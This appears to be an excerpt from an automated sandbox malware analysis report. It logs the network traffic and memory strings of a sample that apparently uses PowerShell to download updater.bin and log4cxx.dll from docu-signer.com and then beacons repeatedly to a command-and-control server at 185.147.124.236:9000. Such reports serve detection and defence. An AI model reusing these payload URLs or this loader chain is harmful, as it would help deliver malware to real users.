                    Source: unknown | TCP traffic detected without corresponding DNS query: 13.107.246.63
                    Source: unknown | TCP traffic detected without corresponding DNS query: 13.107.246.63
                    Source: unknown | TCP traffic detected without corresponding DNS query: 13.107.246.63
                    Source: unknown | TCP traffic detected without corresponding DNS query: 13.107.246.63
                    Source: unknown | TCP traffic detected without corresponding DNS query: 23.206.229.226
                    Source: unknown | TCP traffic detected without corresponding DNS query: 13.107.246.63
                    Source: unknown | TCP traffic detected without corresponding DNS query: 13.107.246.63
                    Source: unknown | TCP traffic detected without corresponding DNS query: 13.107.246.63
                    Source: unknown | TCP traffic detected without corresponding DNS query: 13.107.246.63
                    Source: unknown | TCP traffic detected without corresponding DNS query: 13.107.246.63
                    Source: unknown | TCP traffic detected without corresponding DNS query: 13.107.246.63
                    Source: unknown | TCP traffic detected without corresponding DNS query: 13.107.246.63
                    Source: unknown | TCP traffic detected without corresponding DNS query: 13.107.246.63
                    Source: unknown | TCP traffic detected without corresponding DNS query: 13.107.246.63
                    Source: unknown | TCP traffic detected without corresponding DNS query: 13.107.246.63
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_010329BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,14_2_010329BA
                    Source: global traffic | HTTP traffic detected: GET /SFHgtxFGtB HTTP/1.1 | Host: nopaste.net | Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET /api/uz/0912545164/updater.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: docu-signer.com | Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET /a/index.js HTTP/1.1 | Host: google.com | Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET /a/cpanel/index.js HTTP/1.1 | Host: google.com
                    Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GPDShLsGIjBNTHa46vhxxzI3svQ2szOEquLGyUyxZxQBuj2RZQlJDuaKtjFLGaUS0kljB8sf1rEyBj5qY25kcloBQw HTTP/1.1 | Host: www.google.com | Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET /a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3D6f35d797be3b4dc6:TM%3D1734420848:C%3D%3E:IP%3D8.46.123.189-:S%3Dy11mmdgPywBUlb0wwtqtLg%3B+path%3D/%3B+domain%3Dgoogle.com%3B+expires%3DTue,+17-Dec-2024+10:34:08+GMT HTTP/1.1 | Host: google.com
                    Source: global traffic | HTTP traffic detected: GET /a/cpanel/index.js HTTP/1.1 | Host: google.com
                    Source: global traffic | HTTP traffic detected: GET /api/uz/0912545164/log4cxx.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: docu-signer.com
                    Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GPjShLsGIjBkAj9GyYe8Mn2VArflOAX5Dkd5hzoKr4HdzMDUeL7cS7nxMVqELnj-2vfHDftexjIyBj5qY25kcloBQw HTTP/1.1 | Host: www.google.com
                    Source: global traffic | HTTP traffic detected: GET /a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3D4edbbc5636b91633:TM%3D1734420856:C%3D%3E:IP%3D8.46.123.189-:S%3DPiAKh5tPdjoYVKgKQ9pekg%3B+path%3D/%3B+domain%3Dgoogle.com%3B+expires%3DTue,+17-Dec-2024+10:34:16+GMT HTTP/1.1 | Host: google.com
                    Source: global traffic | HTTP traffic detected: GET /a/cpanel/index.js HTTP/1.1 | Host: google.com
                    Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GIHThLsGIjDx5ax6an8IrIbGtSaXkbbuFYbqM7u7GZiN3ocBa9VXlBoeuufcB9hH8_B5r50qEZgyBj5qY25kcloBQw HTTP/1.1 | Host: www.google.com
                    Source: global traffic | HTTP traffic detected: GET /a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3Db212ceae686b1a2b:TM%3D1734420865:C%3D%3E:IP%3D8.46.123.189-:S%3DwJnO3udFkZJpEbz-woKiKQ%3B+path%3D/%3B+domain%3Dgoogle.com%3B+expires%3DTue,+17-Dec-2024+10:34:25+GMT HTTP/1.1 | Host: google.com
                    Source: global traffic | HTTP traffic detected: GET /a/cpanel/index.js HTTP/1.1 | Host: google.com
                    Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GInThLsGIjDrIt0scVVtiM3JSFb3RaUTq6pNgYIPpnrHnLioDhCG72Z5awWy0pxCwx8WHQsbJDcyBj5qY25kcloBQw HTTP/1.1 | Host: www.google.com
                    Source: global traffic | HTTP traffic detected: GET /a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3D5c9740ab0f014298:TM%3D1734420873:C%3D%3E:IP%3D8.46.123.189-:S%3D8xlQ4eS6xBOUqChbFuYdlg%3B+path%3D/%3B+domain%3Dgoogle.com%3B+expires%3DTue,+17-Dec-2024+10:34:33+GMT HTTP/1.1 | Host: google.com
                    Source: global traffic | HTTP traffic detected: GET /a/cpanel/index.js HTTP/1.1 | Host: google.com
                    Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GJHThLsGIjDsl9uk8UMti6vyOA2cwCYybTHi-uN-Vu1eWDKU71mz6DhAj3ZMShBV8DjUM6Fi4UQyBj5qY25kcloBQw HTTP/1.1 | Host: www.google.com
                    Source: global traffic | HTTP traffic detected: GET /a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3Dcdda55c2ba0f73fc:TM%3D1734420881:C%3D%3E:IP%3D8.46.123.189-:S%3DE-lUnmev__1s1eaH-leEqg%3B+path%3D/%3B+domain%3Dgoogle.com%3B+expires%3DTue,+17-Dec-2024+10:34:41+GMT HTTP/1.1 | Host: google.com
                    Source: global traffic | HTTP traffic detected: GET /a/cpanel/index.js HTTP/1.1 | Host: google.com
                    Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GJrThLsGIjDVWMIW0wC8D2vGAbX1xnBEZhZaln0JIWUmCohbpzzAdFCe8y9sYqb95h1at--W3X0yBj5qY25kcloBQw HTTP/1.1 | Host: www.google.com
                    Source: global traffic | HTTP traffic detected: GET /a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3D07bbdd56f84a91b2:TM%3D1734420890:C%3D%3E:IP%3D8.46.123.189-:S%3DGTmgNXRDtmZ23aRpU0VFnA%3B+path%3D/%3B+domain%3Dgoogle.com%3B+expires%3DTue,+17-Dec-2024+10:34:50+GMT HTTP/1.1 | Host: google.com
                    Source: global traffic | HTTP traffic detected: GET /a/cpanel/index.js HTTP/1.1 | Host: google.com
                    Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GKPThLsGIjBpAOY3pfJzmb7hAtEDpxCUuKZW0ZqVks7Dnms80pix_XdHqWsZBXHZKWdv90VUOt0yBj5qY25kcloBQw HTTP/1.1 | Host: www.google.com
                    Source: global traffic | HTTP traffic detected: GET /a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3D415b9979ef9707d3:TM%3D1734420899:C%3D%3E:IP%3D8.46.123.189-:S%3DJjL-oHlW3PNBRyuC4U_qog%3B+path%3D/%3B+domain%3Dgoogle.com%3B+expires%3DTue,+17-Dec-2024+10:34:59+GMT HTTP/1.1 | Host: google.com
                    Source: global traffic | HTTP traffic detected: GET /a/cpanel/index.js HTTP/1.1 | Host: google.com
                    Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GKvThLsGIjD-3KW32JCZ0mH01QvjulstQQuqXTlrEycWV1xiEPH6R7VbH1HmmmgIPZKaWcmDmHcyBj5qY25kcloBQw HTTP/1.1 | Host: www.google.com
                    Source: global traffic | HTTP traffic detected: GET /a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3Df1b0eeacb1f5bf1d:TM%3D1734420907:C%3D%3E:IP%3D8.46.123.189-:S%3DpcHyDhL6gH6T7NMyEqzmBw%3B+path%3D/%3B+domain%3Dgoogle.com%3B+expires%3DTue,+17-Dec-2024+10:35:07+GMT HTTP/1.1 | Host: google.com
                    Source: global traffic | HTTP traffic detected: GET /a/cpanel/index.js HTTP/1.1 | Host: google.com
                    Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GLPThLsGIjC5NCvaD3O47Z78iPrh7tlF9-ZWdw7GF4ML25f6J-xdtDjbHzyiG58btUPG2e9OBnkyBj5qY25kcloBQw HTTP/1.1 | Host: www.google.com
                    Source: global traffic | HTTP traffic detected: GET /a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3D5312552b7084d89d:TM%3D1734420915:C%3D%3E:IP%3D8.46.123.189-:S%3DBOR3OdsBSIJZK1XomcJ1Iw%3B+path%3D/%3B+domain%3Dgoogle.com%3B+expires%3DTue,+17-Dec-2024+10:35:15+GMT HTTP/1.1 | Host: google.com
                    Source: global traffic | HTTP traffic detected: GET /a/cpanel/index.js HTTP/1.1 | Host: google.com
                    Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GLzThLsGIjAnI-kc_6L7Me3lHKCt5WMda-CG5i_K3cmh0UCzxSMtqg5PaFFo8f0R7aN5C-DK-QoyBj5qY25kcloBQw HTTP/1.1 | Host: www.google.com
                    Source: global traffic | HTTP traffic detected: GET /a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3D263b62db633173b7:TM%3D1734420924:C%3D%3E:IP%3D8.46.123.189-:S%3DS0P5qqAynxx9i1z3ErwX-A%3B+path%3D/%3B+domain%3Dgoogle.com%3B+expires%3DTue,+17-Dec-2024+10:35:24+GMT HTTP/1.1 | Host: google.com
                    Source: global traffic | HTTP traffic detected: GET /a/cpanel/index.js HTTP/1.1 | Host: google.com
                    Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GMTThLsGIjAsC5MLadFNwAXv_38UzRpf6V2jt1cMZErwfkTIE5y365C9qnV4qYgmmcxhTxkKjc8yBj5qY25kcloBQw HTTP/1.1 | Host: www.google.com
                    Source: global traffic | HTTP traffic detected: GET /a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3D1b21e1938b173488:TM%3D1734420932:C%3D%3E:IP%3D8.46.123.189-:S%3DMRKByaEiGwbvo56zhJL4Uw%3B+path%3D/%3B+domain%3Dgoogle.com%3B+expires%3DTue,+17-Dec-2024+10:35:32+GMT HTTP/1.1 | Host: google.com
                    Source: global traffic | HTTP traffic detected: GET /a/cpanel/index.js HTTP/1.1 | Host: google.com
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000
                    Source: global trafficHTTP traffic detected: GET /wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782 HTTP/1.1Host: 185.147.124.236:9000Connection: Keep-Alive
                    Source: global traffic | DNS traffic detected: DNS query: www.irs.gov
                    Source: global traffic | DNS traffic detected: DNS query: nopaste.net
                    Source: global traffic | DNS traffic detected: DNS query: docu-signer.com
                    Source: global traffic | DNS traffic detected: DNS query: google.com
                    Source: global traffic | DNS traffic detected: DNS query: www.google.com
                    Source: global traffic | DNS traffic detected: DNS query: x1.i.lencr.org
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F40000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://185.147.124.236
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002E71000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://185.147.124.236:9000
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F40000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000F.00000002.3840592697.0000000002E71000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://185.147.124.236:9000/wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F40000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://185.147.124.236:9000/wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782P
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F40000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://185.147.124.236:9000t-
                    Source: powershell.exe, 00000004.00000002.3839692541.0000000004933000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3866570932.0000000009341000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 0000000E.00000002.1759556958.0000000005C2F000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1752563394.0000000005D09000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1752324052.0000000005A44000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1751299607.0000000005C2F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.1903110494.00000000054AF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896269134.00000000054AF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896699206.00000000052C4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896814705.0000000005589000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000002.1978034404.000000000566F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1970916028.0000000005484000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1971061934.0000000005749000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1970447343.000000000566F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
                    Source: powershell.exe, 00000004.00000002.3839692541.0000000004933000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3866570932.0000000009341000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 0000000E.00000002.1759556958.0000000005C2F000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1752563394.0000000005D09000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1752324052.0000000005A44000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1751299607.0000000005C2F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.1903110494.00000000054AF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896269134.00000000054AF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896699206.00000000052C4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896814705.0000000005589000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000002.1978034404.000000000566F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1970916028.0000000005484000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1971061934.0000000005749000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1970447343.000000000566F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                    Source: powershell.exe, 00000004.00000002.3839692541.0000000004933000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3866570932.0000000009341000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 0000000E.00000002.1759556958.0000000005C2F000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1752563394.0000000005D09000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1752324052.0000000005A44000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1751299607.0000000005C2F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.1903110494.00000000054AF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896269134.00000000054AF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896699206.00000000052C4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896814705.0000000005589000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000002.1978034404.000000000566F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1970916028.0000000005484000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1971061934.0000000005749000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1970447343.000000000566F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                    Source: powershell.exe, 00000004.00000002.3839692541.0000000004933000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3866570932.0000000009341000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 0000000E.00000002.1759556958.0000000005C2F000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1752563394.0000000005D09000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1752324052.0000000005A44000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1751299607.0000000005C2F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.1903110494.00000000054AF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896269134.00000000054AF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896699206.00000000052C4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896814705.0000000005589000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000002.1978034404.000000000566F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1970916028.0000000005484000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1971061934.0000000005749000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1970447343.000000000566F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
                    Source: powershell.exe, 00000004.00000002.3855333456.0000000006C45000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft0
                    Source: powershell.exe, 00000004.00000002.3866570932.00000000098C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3866570932.0000000009394000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://docu-signer.com
                    Source: powershell.exe, 00000002.00000002.2542129886.0000000005DF9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3849414206.00000000056CA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000004.00000002.3839692541.0000000004933000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3866570932.0000000009341000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 0000000E.00000002.1759556958.0000000005C2F000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1752563394.0000000005D09000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1752324052.0000000005A44000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1751299607.0000000005C2F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.1903110494.00000000054AF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896269134.00000000054AF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896699206.00000000052C4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896814705.0000000005589000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000002.1978034404.000000000566F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1970916028.0000000005484000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1971061934.0000000005749000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1970447343.000000000566F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                    Source: powershell.exe, 00000004.00000002.3839692541.0000000004933000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3866570932.0000000009341000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 0000000E.00000002.1759556958.0000000005C2F000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1752563394.0000000005D09000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1752324052.0000000005A44000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1751299607.0000000005C2F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.1903110494.00000000054AF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896269134.00000000054AF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896699206.00000000052C4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896814705.0000000005589000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000002.1978034404.000000000566F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1970916028.0000000005484000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1971061934.0000000005749000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1970447343.000000000566F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
